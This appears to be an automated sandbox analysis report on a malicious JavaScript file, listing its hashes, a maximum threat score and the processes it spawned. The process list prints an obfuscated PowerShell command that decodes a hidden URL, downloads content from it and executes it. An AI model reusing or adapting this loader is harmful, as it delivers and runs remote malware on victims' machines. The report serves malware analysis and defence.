Analysis

  • max time kernel
    120s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20231020-en
  • resource tags

    arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system
  • submitted
    31/10/2023, 20:21

General

  • Target

    NQRX0468_5871143.js

  • Size

    270KB

  • MD5

    a2e2da4033a7080a9b5d3fa24d150a8e

  • SHA1

    285433bc8135b46f468fb6d0c374c482b164e938

  • SHA256

    968593a6e89a4498ec0a56643dde91dc2412a9e2344c0b97a79af38b1ef26727

  • SHA512

    9fc5d4e8205042971e4c253346c5c3ae380db9baf6fd17ef3264ed79e2bdc70089b1efd1f3d99e50f1a24b9bba47d308e0a1b68cd81609165c337905675ef908

  • SSDEEP

    1536:JNiN4YlrlHqsDNgJqQAXq8+8EYYZPPnvqgu0V2OkHKFl8OBlaGLsAX5dYiTlSQpP:uNbqsCQ9B5qqF7Wl8xap7Htn7

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\NQRX0468_5871143.js
    1⤵
      PID:2888
    • C:\Windows\system32\conhost.exe
      conhost --headless powershell $tqgxwnpsabil=(8708,8693,8710,8714,8711,8715,8694,8705,8639,8709,8704,8705,8640,8642,8639,8705,8697,8705,8656,8697,8690,8708,8697,8654);$dosvorv=('richard','net-secure','get-container', 'display-addin');foreach($rob9e in $tqgxwnpsabil){$awi=$rob9e;$mbpvydxqefcr=$mbpvydxqefcr+[char]($awi-8593);$vizit=$mbpvydxqefcr; $lira=$vizit};$jlcbwxstuopf[2]=$lira;$dmzkpt='rl';$five=1;new-alias zwert cu$dmzkpt;.$([char](9992-9887)+'ex')(zwert -useb $lira)
      1⤵
      • Process spawned unexpected child process
      PID:2812

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads